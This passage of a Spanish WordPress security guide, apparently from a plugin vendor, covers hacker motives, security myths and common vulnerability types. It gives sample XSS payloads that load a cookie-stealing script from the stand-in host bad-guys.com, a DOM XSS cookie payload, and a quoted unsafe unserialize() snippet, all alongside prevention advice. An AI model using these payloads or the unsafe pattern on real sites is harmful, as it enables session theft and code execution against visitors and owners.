Seguridad de WordPress: la guía definitiva

La seguridad de WordPress puede ser intimidante, pero no tiene por qué serlo. En esta guía completa de seguridad de WordPress, hemos simplificado los conceptos básicos de la seguridad de su sitio web de WordPress para que cualquier persona sin conocimientos técnicos pueda comprender y proteger su sitio web de los ataques de piratas informáticos.

Esta guía de seguridad de WordPress se divide en 10 secciones fácilmente digeribles. Cada sección lo guiará a través de un aspecto específico de la seguridad de WordPress. Al final de la guía, aprenderá los diferentes tipos de vulnerabilidades, los motivos de los piratas informáticos y cómo proteger todo, desde su servidor hasta los usuarios individuales de su sitio web de WordPress.

¡Vamos a sumergirnos!

Sección 1: ¿WordPress es seguro?

¿Es seguro WordPress? La respuesta corta es sí.

¿WordPress tiene problemas de seguridad?

Si bien WordPress en sí es seguro, evitar los errores de seguridad de WordPress requiere un poco de esfuerzo por parte de los propietarios del sitio. La verdad es que el mayor problema de seguridad de WordPress son sus usuarios. La mayoría de los hacks de WordPress en la plataforma se pueden evitar con un poco de esfuerzo por parte de los propietarios del sitio.

No se preocupe, lo tenemos cubierto. Esta guía le enseñará todo lo que necesita saber para mantener su sitio web seguro.

Antes de que podamos proteger nuestros sitios web, primero debemos comprender cinco cosas.

1. Por qué los piratas informáticos atacan sitios web
2. Los diferentes tipos de hacks de WordPress
3. Tipos específicos de vulnerabilidades de WordPress
4. Cómo prevenir las vulnerabilidades de WordPress
5. Cómo determinar la gravedad de una vulnerabilidad

¿Por qué un hacker atacaría mi sitio web?

Esta es una pregunta común de seguridad de WordPress que podría hacer cuando su peor pesadilla comience a hacerse realidad. ¿Por qué un hacker atacaría mi sitio web? Tenga la seguridad de que las posibilidades de que el ataque sea personal son escasas o nulas. Los piratas informáticos tienen motivos subyacentes que no tienen nada que ver con el contenido de su sitio web. Por lo general, a los piratas informáticos no les importa si su sitio web es una página de caridad para cachorros sin hogar o un sitio con toneladas de productos geniales a la venta.

Sin embargo, es difícil no sentirse atacado cuando una identidad sin rostro ha pirateado su sitio web, causando caos y confusión. Te sientes estresado y como si la situación se estuviera saliendo de tu control. Te sientes atacado personalmente y te preguntas si hay una manera de evitar que ocurra el ataque. Incluso podría preguntarse si hay algo para salvar los restos que eran su sitio web.

Entonces, ¿qué es lo que hace que un pirata informático se dirija a un sitio web? No tiene nada que ver con su sitio web, los temas que cubre ni nada por el estilo. En realidad, los piratas informáticos se dirigen al software que utiliza su sitio web para mantenerse en funcionamiento. Al piratear este software, pueden robar datos confidenciales de los clientes o incluso tomar el control de su sitio web de WordPress.

Desafortunadamente, con su creciente popularidad, WordPress también se ha convertido en un objetivo para los piratas informáticos. Si un plugin de WordPress popular tiene una vulnerabilidad seria, un pirata informático tiene potencialmente los planos para hacerse cargo de cientos de miles, si no millones de sitios web. Afortunadamente, la mayoría de las vulnerabilidades de los complementos son parcheadas rápidamente por sus desarrolladores.

Al poder obtener información confidencial y privada, los piratas informáticos pueden venderla para obtener un ingreso o incluso retener el rescate de datos, esencialmente haciendo que las personas paguen para recuperar su información en manos seguras.

Entonces, ¿cuál es la principal motivación de los piratas informáticos?

Para crear flujo de caja por sí mismos.

Internet es un lugar lucrativo que ofrece a todos los ámbitos de la vida la oportunidad de generar un salario digno. Sin embargo, eso no significa que todo el mundo haga esto de una manera legal y moralista. Los piratas informáticos obtienen grandes beneficios incluso del sitio web más pequeño.

El dinero es toda la motivación que necesitan, pero algunos disfrutan de la sensación de poder que obtienen cuando violan con éxito un sitio web, pero la gran mayoría está en el negocio únicamente por el dinero en efectivo.

Sección 2: Los 5 principales mitos de seguridad de WordPress desmentidos

Antes de pasar al resto de esta guía de seguridad de WordPress, tomemos un minuto para desacreditar algunos mitos de seguridad de WordPress.

Encontrará muchos consejos de seguridad de WordPress flotando en Internet de personas bien intencionadas que realmente quieren ayudar. Desafortunadamente, algunos de estos consejos se basan en los mitos de seguridad de WordPress y en realidad no agregan seguridad adicional a su sitio web de WordPress. De hecho, algunos “consejos” de seguridad de WordPress pueden aumentar la probabilidad de que surja problemas y conflictos.

Tenemos muchos mitos de seguridad de WordPress para elegir, pero solo nos enfocaremos en los 5 primeros que hemos visto consistentemente en más de 30,000 tickets de soporte. Estas conversaciones con nuestros clientes se utilizaron como base para los siguientes criterios para seleccionar los principales mitos de seguridad de WordPress:

1. La frecuencia con la que se mencionó el mito.
2. La cantidad de dolores de cabeza que provocó el mito.
3. La falsa sensación de seguridad que da el mito.

1. Debe ocultar su URL / wp-admin o / wp-login (también conocida como Hide Backend)

La idea detrás de ocultar el wp-admin es que los piratas informáticos no pueden piratear lo que no pueden encontrar. Si su URL de inicio de sesión no es la URL estándar de WordPress / wp-admin / URL, ¿no está protegido contra ataques de fuerza bruta?

La verdad es que la mayoría de las funciones de Hide Backend son simplemente seguridad a través de la oscuridad, que no es una estrategia de seguridad de WordPress a prueba de balas. Si bien ocultar la URL wp-admin de backend puede ayudar a mitigar algunos de los ataques a su inicio de sesión, este enfoque no los detendrá a todos.

Con frecuencia recibimos tickets de soporte de personas que están perplejas por cómo iThemes Security Pro informa intentos de inicio de sesión no válidos cuando han ocultado su inicio de sesión. Eso es porque hay otras formas de iniciar sesión en sus sitios de WordPress además de usar un navegador, como usar XML-RPC o la API REST. Sin mencionar que después de cambiar la URL de inicio de sesión, otro complemento o tema aún podría vincularse a la nueva URL.

De hecho, la función Hide Backend realmente no cambia nada. Sí, evita que la mayoría de los usuarios accedan directamente a la URL de inicio de sesión predeterminada. Pero después de que alguien ingresa la URL de inicio de sesión personalizada, se le redirige a la URL de inicio de sesión predeterminada de WordPress.

También se sabe que personalizar la URL de inicio de sesión causa conflictos. Hay algunos complementos, temas o aplicaciones de terceros que codifican wp-login.php en su base de código. Entonces, cuando una pieza de software codificada está buscando yoursite.com/wp-login.php, encuentra un error en su lugar.

2. Debe ocultar el nombre de su tema y el número de versión de WordPress

Si utiliza las herramientas de desarrollo de su navegador, puede ver rápidamente el nombre del tema y el número de versión de WordPress que se ejecuta en un sitio de WordPress. La teoría detrás de ocultar el nombre de su tema y la versión de WP es que si los atacantes tienen esta información, tendrán el plan para ingresar a su sitio.

Por ejemplo, mirando la captura de pantalla anterior, puede ver que este sitio usa Twenty Twenty-One y la versión de WordPress es 5.6.

El problema con este mito de seguridad de WordPress es que no hay un tipo real detrás de un teclado que busque la combinación perfecta de tema y número de versión de WordPress para atacar. Sin embargo, hay bots sin sentido que recorren Internet en busca de vulnerabilidades conocidas en el código real que se ejecuta en su sitio web, por lo que ocultar el nombre de su tema y el número de versión de WP no lo protegerá.

3. Debe cambiar el nombre de su directorio wp-content

El directorio wp-content contiene sus complementos, temas y carpeta de carga de medios. Eso es un montón de cosas buenas y código ejecutable, todo en un directorio, por lo que es comprensible que la gente quiera ser proactiva y proteger esta carpeta.

Desafortunadamente, es un mito de seguridad de WordPress que cambiar el nombre del contenido de wp agregará una capa adicional de seguridad al sitio. No lo hará. Podemos encontrar fácilmente el nombre de su directorio wp-content modificado utilizando las herramientas de desarrollo del navegador. En la captura de pantalla a continuación, podemos ver que cambié el nombre del directorio de contenido de este sitio a / test /.

Cambiar el nombre del directorio no agregará seguridad a su sitio, pero puede causar conflictos para los complementos que tienen la ruta del directorio / wp-content / codificada.

4. Mi sitio web no es lo suficientemente grande como para llamar la atención de los piratas informáticos

Este mito de seguridad de WordPress deja a muchos sitios vulnerables a los ataques. Incluso si eres el propietario de un sitio pequeño con poco tráfico, es crucial que seas proactivo para proteger tu sitio web.

Incluso si eres el propietario de un sitio pequeño con poco tráfico, es crucial que seas proactivo para proteger tu sitio web.

La verdad es que su sitio o negocio no tiene que ser grande para llamar la atención de un posible atacante. Los piratas informáticos todavía ven la oportunidad de usar su sitio como un conducto para redirigir a algunos de sus visitantes a sitios maliciosos, enviar spam desde su servidor de correo, propagar virus o incluso minar Bitcoin. Tomarán todo lo que puedan.

5. WordPress es una plataforma insegura

El mito de seguridad de WordPress más dañino es que WordPress en sí mismo es inseguro. Esto simplemente no es cierto. WordPress es el sistema de administración de contenido más popular del mundo, y no fue así por no tomarse la seguridad en serio.

Sección 3: Hacks de WordPress y vulnerabilidades de WordPress

4 tipos de hacks de WordPress

Cuando se trata de comprender la seguridad de WordPress, es importante comprender

1. Spam de SEO

Otra motivación para que un hacker ataque su sitio web es obtener los beneficios del spam de SEO. SEO, u optimización de motores de búsqueda, es lo que utilizan los motores de búsqueda para indexar o clasificar su sitio web. Al usar ciertas palabras clave, colocadas estratégicamente en sus páginas web y publicaciones de blog, puede ayudar a que su sitio web tenga una clasificación más alta en las búsquedas de Google. Esto generará tráfico a su sitio web y puede ayudarlo a obtener ganancias que valgan la pena.

Los piratas informáticos saben todo sobre SEO y lo utilizan para su beneficio. Cuando su sitio web se ha visto comprometido, los piratas informáticos instalarán una puerta trasera en su sitio web. Esto les permite controlar sus palabras clave y el contenido del sitio web de forma remota. A menudo redirigirán el tráfico de su sitio web, canalizándolo directamente al suyo, pasando por alto el suyo por completo.

Esto dejará a su público objetivo confundido y frustrado, destruyendo la reputación y credibilidad de su sitio web. Los visitantes de su sitio web a menudo serán redirigidos a sitios que obviamente son estafas, y dudarán en volver a visitar su sitio web en el futuro.

Como si eso no fuera lo suficientemente malo, los piratas informáticos que utilizan este enfoque hacen que su sitio web se vea mal para los motores de búsqueda, no solo para los demás seres humanos. Su sitio web ya no parecerá legítimo y su clasificación caerá rápidamente. Sin una clasificación alta en las búsquedas, su sitio se convertirá en uno de los millones que nunca reciben más de unas pocas visitas al mes.

2. Inyecciones de software malintencionado

Muchos piratas informáticos atacan su sitio web con la intención de infectarlo con malware. El malware son pequeños fragmentos de código que se pueden utilizar para realizar cambios maliciosos en su sitio web. Si su sitio se infecta con malware, es importante recibir una alerta lo antes posible.

Cada minuto que el malware permanece en su sitio web, está causando más daño a su sitio web. Cuanto más daño se haga a su sitio web, más tiempo le llevará limpiar y restaurar su sitio web. Es vital comprobar el estado de su sitio web mediante la exploración periódica de malware. Por eso es fundamental comprobar continuamente el estado de su sitio web mediante la búsqueda de malware.

3. Ransomware

Un pirata informático podría querer atacar su sitio web para retenerlo para obtener un rescate. El ransomware se refiere a cuando un pirata informático se apodera de su sitio web y no se lo devolverá a menos que le pague una tarifa considerable. El tiempo medio de inactividad de un ataque de ransomware es de 9,5 días. ¿Cuánto le costarían 10 días sin ventas?

El rescate promedio que los piratas informáticos están solicitando ha aumentado drásticamente, de $ 294 en 2015 a más de $ 13,000 en 2020. Con este tipo de pagos, el negocio del crimen en línea no se está desacelerando. Se está volviendo cada vez más crítico asegurar y proteger adecuadamente su sitio web a medida que las comunidades criminales como esta crecen.

4. Deformación del sitio web

Algunos piratas informáticos pueden atacar su sitio web para divertirse un poco. Un estilo de piratería que es menos intrínsecamente maligno es el de los desfiguradores de sitios web. Por lo general, son niños o adultos jóvenes que recién comienzan a jugar con sus habilidades de piratería. Hacen trucos como estos como una forma de practicar y mejorar sus habilidades.

Cuando hablamos de que un sitio web está siendo desfigurado, piense en el graffiti. Los atacantes alterarán por completo la apariencia de su sitio web, a veces de formas divertidas o extravagantes. Los típicos desfiguradores de sitios web están haciendo sus hazañas por diversión o como una forma de lucirse. A menudo publican fotos de sus fechorías, tratando de competir entre sí para ganar el premio a la mejor desfiguración.

La buena noticia es que esta forma de piratería es menos peligrosa para que la experimente. Además, dado que son en su mayoría adolescentes y otros piratas informáticos aficionados los que realizan las desfiguraciones, son más fáciles de detectar y eliminar de su sitio web en comparación con otras formas de malware. Por lo general, los escáneres pueden detectarlos y eliminarlos rápidamente.

21 vulnerabilidades comunes de WordPress explicadas

Desafortunadamente, existen vulnerabilidades de WordPress. Las vulnerabilidades de WordPress pueden existir en sus complementos, sus temas e incluso en el núcleo de WordPress. Y dado que WordPress ahora impulsa casi el 40% de todos los sitios web, la tarea de comprender las vulnerabilidades es aún más importante. En pocas palabras: tienes que estar atento a la seguridad de tu sitio web.

Si no es un experto en seguridad de WordPress, comprender todas las diversas vulnerabilidades de WordPress puede resultar abrumador. También puede resultar abrumador tratar de comprender los diferentes niveles de gravedad de una vulnerabilidad, junto con los riesgos de la vulnerabilidad de WordPress.

Esta guía definirá las 21 vulnerabilidades de WordPress más comunes, cubrirá cómo calificar la gravedad de una vulnerabilidad de WordPress, dará ejemplos de cómo un pirata informático puede explotar la vulnerabilidad y mostrará cómo se pueden prevenir estas vulnerabilidades. Vamos a sumergirnos.

¿Qué es una vulnerabilidad de WordPress?

Una vulnerabilidad de WordPress es una debilidad o falla en un tema, complemento o núcleo de WordPress que puede ser aprovechado por un pirata informático. En otras palabras, las vulnerabilidades de WordPress crean un punto de entrada que un pirata informático puede usar para realizar actividades maliciosas.

Tenga en cuenta que la piratería de sitios web es casi totalmente automatizada. Debido a esto, los piratas informáticos pueden ingresar fácilmente a una gran cantidad de sitios web en prácticamente nada de tiempo. Los piratas informáticos utilizan herramientas especiales que escanean Internet en busca de vulnerabilidades conocidas.

A los piratas informáticos les gustan los objetivos fáciles, y tener un sitio web que ejecuta software con vulnerabilidades conocidas es como entregarle a un pirata informático las instrucciones paso a paso para ingresar a su sitio web, servidor, computadora o cualquier otro dispositivo conectado a Internet de WordPress.

Nuestros informes mensuales de resumen de vulnerabilidades de WordPress cubren todas las vulnerabilidades del núcleo, el complemento de WordPress y el tema de WordPress divulgadas públicamente. En estos resúmenes, compartimos el nombre del complemento o tema vulnerable, las versiones afectadas y el tipo de vulnerabilidad.

¿Qué es la vulnerabilidad de día cero?

Cuando se trata de la seguridad de WordPress, es importante comprender la definición de vulnerabilidad de día cero. Debido a que la vulnerabilidad fue revelada al público, el desarrollador tiene cero días para parchear la vulnerabilidad. Y esto puede tener grandes implicaciones para sus complementos y temas.

Por lo general, un investigador de seguridad descubrirá una vulnerabilidad y la revelará en privado a los desarrolladores de la empresa que poseen el software. El investigador de seguridad y el desarrollador acuerdan que los detalles completos se publicarán una vez que el parche esté disponible. Puede haber un ligero retraso en la divulgación de la vulnerabilidad después de que se publique el parche para que más personas tengan tiempo de actualizar las principales vulnerabilidades de seguridad.

Sin embargo, si un desarrollador no responde al investigador de seguridad o no proporciona un parche para la vulnerabilidad, entonces el investigador puede revelar públicamente la vulnerabilidad para presionar al desarrollador para que emita un parche.

Revelar públicamente una vulnerabilidad y aparentemente introducir un día cero puede parecer contraproducente. Pero es la única ventaja que tiene un investigador para presionar al desarrollador para que parchee la vulnerabilidad.

Project Zero de Google tiene pautas similares cuando se trata de revelar vulnerabilidades. Publican los detalles completos de la vulnerabilidad después de 90 días. Si la vulnerabilidad ha sido parcheada o no.

La vulnerabilidad está ahí para que cualquiera la encuentre. Si un pirata informático encuentra la vulnerabilidad antes de que el desarrollador lance un parche, se convierte en la peor pesadilla del usuario final…. Un día cero explotado activamente.

¿Qué es una vulnerabilidad de día cero explotada activamente?

Una vulnerabilidad de día cero explotada activamente es exactamente lo que parece. Es una vulnerabilidad sin parches que los piratas informáticos están apuntando, atacando y explotando activamente.

A fines de 2018, los piratas informáticos estaban explotando activamente una vulnerabilidad grave de WordPress en el complemento WP GDPR Compliance. El exploit permitió a los usuarios no autorizados (más sobre esto en la siguiente sección) modificar la configuración de registro de usuario de WP y cambiar la nueva función de usuario predeterminada de suscriptor a administrador.

Estos piratas informáticos encontraron esta vulnerabilidad antes que el complemento WP GDPR Compliance y los investigadores de seguridad. Por lo tanto, cualquier sitio web que tuviera el complemento instalado era una marca fácil y garantizada para los ciberdelincuentes.

Cómo protegerse de una vulnerabilidad de día cero

La mejor manera de proteger su sitio web de una vulnerabilidad de día cero es desactivar y eliminar el software hasta que se repare la vulnerabilidad. Afortunadamente, los desarrolladores del complemento WP GDPR Compliance actuaron rápido y lanzaron un parche para la vulnerabilidad el día después de su divulgación pública.

Las vulnerabilidades sin parches hacen que su sitio web sea un objetivo fácil para los piratas informáticos.

Vulnerabilidades de WordPress no autenticadas frente a autenticadas

Hay dos términos más con los que debe estar familiarizado cuando se habla de las vulnerabilidades de WordPress.

1. No autenticado : una vulnerabilidad de WordPress no autenticada significa que cualquiera puede aprovechar la vulnerabilidad.
2. Autenticado : una vulnerabilidad de WordPress autenticada significa que requiere un usuario que haya iniciado sesión para explotarla.

Una vulnerabilidad que requiere un usuario autenticado es mucho más difícil de explotar para un pirata informático, especialmente si requiere privilegios de nivel de administrador. Y, si un hacker ya tiene en sus manos un conjunto de credenciales de administrador, realmente no necesita explotar una vulnerabilidad para causar estragos.

Hay una salvedad. Algunas vulnerabilidades autenticadas solo requieren capacidades de nivel de suscriptor para explotarlas. Si su sitio web permite que cualquiera se registre, realmente no hay mucha diferencia entre esto y una vulnerabilidad no autenticada.

Cuando se trata de vulnerabilidades de WordPress, existen 21 tipos comunes de vulnerabilidades. Cubramos cada uno de estos tipos de vulnerabilidades de WordPress.

1. Omisión de autenticación

Una vulnerabilidad de omisión de autenticación permite a un atacante saltarse los requisitos de autenticación y realizar tareas normalmente reservadas para los usuarios autenticados.

La autenticación es el proceso de verificar la identidad de un usuario. WordPress requiere que los usuarios ingresen un nombre de usuario y una contraseña para verificar su identidad.

Ejemplo de omisión de autenticación

Las aplicaciones verifican la autenticación basándose en un conjunto fijo de parámetros. Un atacante podría modificar estos parámetros para obtener acceso a páginas web que normalmente requieren autenticación.

Un ejemplo muy básico de algo como esto es un parámetro de autenticación en la URL.

 https:/my-website/some-plugint?param=authenticated&param=no

La URL anterior tiene un parámetro de autenticación que tiene un valor de no. Entonces, cuando visitemos esta página, se nos presentará un mensaje informándonos que no estamos autorizados a ver la información en esta página.

Sin embargo, si la verificación de autenticación estaba mal codificada, un atacante podría modificar el parámetro de autenticación para obtener acceso a la página privada.

 https:/my-website/some-plugint?param=authenticated&param=yes

En este ejemplo, un pirata informático podría cambiar el valor de autenticación en la URL a sí para omitir el requisito de autenticación para ver la página.

Cómo prevenir la prevención de omisión de autenticación

Puede ayudar a proteger su sitio web de las vulnerabilidades de la autenticación rota mediante la autenticación de dos factores.

2. Vulnerabilidad de puerta trasera

Una vulnerabilidad de puerta trasera permite a los usuarios autorizados y no autorizados eludir las medidas de seguridad normales de WordPress y obtener acceso de alto nivel a una computadora, servidor, sitio web o aplicación.

Ejemplo de puerta trasera

Un desarrollador crea una puerta trasera para que pueda cambiar rápidamente entre codificar y probar el código como usuario administrador. Desafortunadamente, el desarrollador se olvida de eliminar la puerta trasera antes de que el software se lance al público.

Si un pirata informático encuentra la puerta trasera, puede explotar el punto de entrada para obtener acceso de administrador al software. Ahora que el pirata informático tiene acceso de administrador, puede hacer todo tipo de acciones maliciosas, como inyectar malware o robar datos confidenciales.

Cómo prevenir una puerta trasera

Muchas puertas traseras pueden reducirse a un solo problema, una mala configuración de seguridad. Los problemas de mala configuración de seguridad de WordPress se pueden mitigar eliminando las funciones no utilizadas en el código, manteniendo todas las bibliotecas actualizadas y haciendo que los mensajes de error sean más generales.

3. Vulnerabilidad de inyección de objetos PHP

Se produce una vulnerabilidad de inyección de objetos PHP cuando un usuario envía una entrada que no está desinfectada (lo que significa que los caracteres ilegales no se eliminan) antes de unserialized() a la función PHP no unserialized() .

Ejemplo de inyección de objetos PHP

Aquí hay un ejemplo del mundo real de una vulnerabilidad de inyección de objetos PHP en el complemento de WordPress Sample Ads Manager que fue reportada originalmente por sumofpwn.

El problema se debe a dos llamadas inseguras a unserialize () en el archivo de complementos sam-ajax-loader.php . La entrada se toma directamente de la solicitud POST como se puede ver en el código a continuación.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

Este problema podría provocar que un atacante ingrese y ejecute código malicioso.

Cómo prevenir la inyección de objetos PHP

No use la función unserialize() con la entrada proporcionada por el usuario, use funciones JSON en su lugar.

4. Vulnerabilidad de secuencias de comandos entre sitios

Se produce una vulnerabilidad de XSS o Cross-Site Scripting cuando una aplicación web permite a los usuarios agregar código personalizado en la ruta URL. Un atacante puede aprovechar la vulnerabilidad para ejecutar código malicioso en el navegador web de la víctima, crear una redirección a un sitio web malicioso o secuestrar la sesión de un usuario.

Hay tres tipos principales de XSS, reflejados. almacenado y basado en DOM

5. Vulnerabilidad reflejada de secuencias de comandos entre sitios

Un XSS reflejado o una secuencia de comandos entre sitios reflejada se produce cuando se envía una secuencia de comandos maliciosa en una solicitud de cliente (una solicitud realizada por usted en un navegador) a un servidor y el servidor lo refleja y lo ejecuta su navegador.

Ejemplo de secuencia de comandos entre sitios reflejada

Digamos que yourfavesite.com requiere que inicie sesión para ver parte del contenido del sitio web. Y digamos que este sitio web no codifica correctamente las entradas del usuario.

Un atacante podría aprovechar esta vulnerabilidad creando un enlace malicioso y compartirlo con los usuarios de yourfavesite.com en correos electrónicos y publicaciones en redes sociales.

El atacante utiliza una herramienta de acortamiento de URL para hacer que el enlace malicioso parezca no amenazante y muy yourfavesite.com/cool-stuff , yourfavesite.com/cool-stuff . Pero, cuando hace clic en el enlace abreviado, su navegador ejecuta el enlace completo yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js .

Después de hacer clic en el enlace, se lo dirigirá a yourfavesite.com , y la secuencia de comandos maliciosa se reflejará en su navegador, lo que permitirá al atacante secuestrar las cookies de su sesión y la cuenta de yourfavesite.com .

Cómo evitar la creación de secuencias de comandos entre sitios reflejados

La regla n. ° 5 en la hoja de trucos de prevención de secuencias de comandos cruzadas de OWASP es la codificación de URL antes de insertar datos que no son de confianza en valores de parámetros de URL HTML. Esta regla puede ayudar a evitar la creación de una vulnerabilidad XSS reflejada al agregar datos que no son de confianza en el valor del parámetro HTTP GET.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. Vulnerabilidad almacenada de secuencias de comandos entre sitios

Una vulnerabilidad Stored XSS o Stored Cross-Site Scripting permite a los piratas informáticos inyectar código malicioso y almacenarlo en el servidor de una aplicación web.

Ejemplo almacenado de secuencias de comandos entre sitios

Un atacante descubre que yourfavesite.com permite a los visitantes incrustar etiquetas HTML en la sección de comentarios del sitio. Entonces el atacante crea un nuevo comentario:

¡Excelente artículo! Consulte este otro gran artículo relacionado con <script src=”http://bad-guys.com/passwordstealingcode.js> . </script>

Nota: Una vulnerabilidad XSS reflejada requeriría que un visitante haga clic en el enlace del código malicioso para ejecutarlo. Un ataque XSS almacenado solo requiere que se visite la página que contiene el comentario. El código malicioso se ejecuta con cada carga de página.

Ahora que nuestro malo ha agregado el comentario, todos los futuros visitantes de esta página estarán expuestos a su script malicioso. El script está alojado en el sitio web del malo y tiene la capacidad de secuestrar las cookies de sesión de los visitantes y yourfavesite.com cuentas de yourfavesite.com .

Cómo evitar el almacenamiento de secuencias de comandos entre sitios

La regla n. ° 1 en la hoja de trucos de prevención de secuencias de comandos cruzadas de OWASP es la codificación HTML antes de agregar datos que no son de confianza en elementos HTML.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

Codificar los siguientes caracteres para evitar cambiar a cualquier contexto de ejecución, como script, estilo o controladores de eventos. El uso de entidades hexadecimales se recomienda en la especificación.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. Vulnerabilidad de secuencias de comandos entre sitios basadas en modelos de objetos de documentos

Una vulnerabilidad XSS basada en DOM o de secuencia de comandos entre sitios basada en el modelo de objetos de documento se produce cuando la secuencia de comandos del lado del cliente de un sitio web escribe datos proporcionados por el usuario en el Modelo de objetos de documento (DOM). El sitio web luego lee la fecha del usuario del DOM y la envía al navegador web del visitante.

Si los datos proporcionados por el usuario no se manejan correctamente, un atacante podría inyectar código malicioso que se ejecutaría cuando el sitio web lea el código del DOM.

Nota: XSS reflejado y almacenado son problemas del lado del servidor, mientras que XSS basado en DOM es un problema del cliente (navegador).

Ejemplo de scripting entre sitios basado en modelos de objetos de documento

Una forma común de explicar un ataque DOM XSS es una página de bienvenida personalizada. Después de crear una cuenta, digamos que yourfavesite.com es redirigido a una página de bienvenida personalizada para darle la bienvenida por nombre usando el código a continuación. Y el nombre de usuario está codificado en la URL.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

Entonces, tendríamos una URL de yourfavesite.com/account?name=yourname .

Un atacante podría realizar un ataque XSS basado en DOM enviando la siguiente URL al nuevo usuario:

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

Cuando el nuevo usuario hace clic en el enlace, su navegador envía una solicitud para:

 /account?name=<script>alert(document.cookie)</script>

a bad-guys.com . El sitio web responde con la página que contiene el código Javascript anterior.

El navegador del nuevo usuario crea un objeto DOM para la página, en el que el objeto document.location contiene la cadena:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

El código original en la página no espera que el parámetro predeterminado contenga marcado HTML, repitiendo el marcado en la página. Luego, el navegador del nuevo usuario representará la página y ejecutará el script del atacante:

 alert(document.cookie)

Cómo prevenir la secuencia de comandos entre sitios basada en DOM

La regla n. ° 1 de la hoja de trucos de prevención de secuencias de comandos de sitios cruzados basada en OWASP Dom es el escape HTML. Luego, JS se escapa antes de agregar datos que no son de confianza en el subcontexto HTML dentro del contexto de ejecución.

Ejemplos de métodos HTML peligrosos:

Atributos

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

Métodos

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

Para realizar actualizaciones dinámicas de HTML en DOM de forma segura, OWASP recomienda:

1. Codificación HTML y luego
2. JavaScript codifica toda la entrada que no es de confianza, como se muestra en estos ejemplos:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. Vulnerabilidad de falsificación de solicitudes entre sitios

Una vulnerabilidad CSRF o de falsificación de solicitudes entre sitios se produce cuando un ciberdelincuente engaña a un usuario para que realice acciones no deseadas. El atacante falsifica la solicitud del usuario a una aplicación.

Ejemplo de falsificación de solicitud entre sitios

En nuestro Resumen de vulnerabilidades de WordPress de enero de 2020, informamos sobre la vulnerabilidad de falsificación de solicitudes entre sitios que se encuentra en el complemento Fragmentos de código. (El complemento se parcheó rápidamente en la versión 2.14.0)

La falta de protección CRSF del complemento permitió a cualquiera falsificar una solicitud en nombre de un administrador e inyectar código ejecutable en un sitio vulnerable. Un atacante podría haberse aprovechado de esta vulnerabilidad para ejecutar código malicioso e incluso realizar una toma de control completa del sitio.

Cómo prevenir la falsificación de solicitudes entre sitios

La mayoría de los marcos de codificación tienen defensas de token sincronizadas integradas para proteger contra CSRF, y deben usarse.

También hay componentes externos como CSRF Protector Project que se pueden utilizar para proteger las vulnerabilidades de PHP y Apache CSRF.

9. Vulnerabilidad de falsificación de solicitudes del lado del servidor

Una vulnerabilidad SSRF o del falsificador de solicitudes del sitio del servidor permite a un atacante engañar a una aplicación del lado del servidor para que realice solicitudes HTTP a un dominio arbitrario de su elección.

Ejemplo de falsificación de solicitud del lado del servidor

Se podría aprovechar una vulnerabilidad SSRF para realizar un ataque Reflected Cross-Site Scripting. Un atacante podría obtener un script malicioso de bad-guys.com y entregarlo a todos los visitantes de un sitio web.

Cómo evitar la falsificación de solicitudes del lado del servidor

El primer paso para mitigar las vulnerabilidades de la SSRF es validar las entradas. Por ejemplo, si su servidor se basa en URL proporcionadas por el usuario para obtener diferentes archivos, debe validar la URL y permitir solo hosts de destino en los que confíe.

Para obtener más información sobre la prevención de SSRF, consulte la hoja de trucos de OWASP.

10. Vulnerabilidad de escalamiento de privilegios

Una vulnerabilidad de escalamiento de privilegios permite a un atacante ejecutar tareas que normalmente requieren privilegios de nivel superior.

Ejemplo de escalamiento de privilegios

En nuestro Resumen de vulnerabilidades de WordPress de noviembre de 2020, informamos sobre una vulnerabilidad de escalada de privilegios encontrada en el complemento Ultimate Member (la vulnerabilidad se corrigió en la versión 2.1.12).

Un atacante podría proporcionar un parámetro de matriz para el meta de usuario wp_capabilities que define el rol de un usuario. Durante el proceso de registro, los detalles de registro enviados se pasaron a la función update_profile , y cualquier metadato respectivo que se envió, independientemente de lo que se envió, se actualizaría para ese usuario recién registrado.

Básicamente, la vulnerabilidad permitió que un nuevo usuario solicitara administrador al registrarse.

Cómo evitar la escalada de privilegios

iThemes Security Pro puede ayudar a proteger su sitio web contra el control de acceso roto al restringir el acceso de administrador a una lista de dispositivos confiables.

11. Vulnerabilidad de ejecución remota de código

Una vulnerabilidad de ejecución remota de código o RCE permite a un atacante acceder y realizar cambios e incluso apoderarse de una computadora o servidor.

Ejemplo de ejecución remota de código

En 2018, Microsoft reveló una vulnerabilidad de ejecución remota de código encontrada en Excel.

Un atacante que aproveche con éxito la vulnerabilidad podría ejecutar código arbitrario en el contexto del usuario actual. Si el usuario actual ha iniciado sesión con derechos de usuario administrativo, un atacante podría tomar el control del sistema afectado. Entonces, un atacante podría instalar programas; ver, cambiar o eliminar datos; o cree nuevas cuentas con todos los derechos de usuario. Los usuarios cuyas cuentas están configuradas para tener menos derechos de usuario en el sistema podrían verse menos afectados que los usuarios que operan con derechos de usuario administrativos.

Cómo prevenir la ejecución remota de código

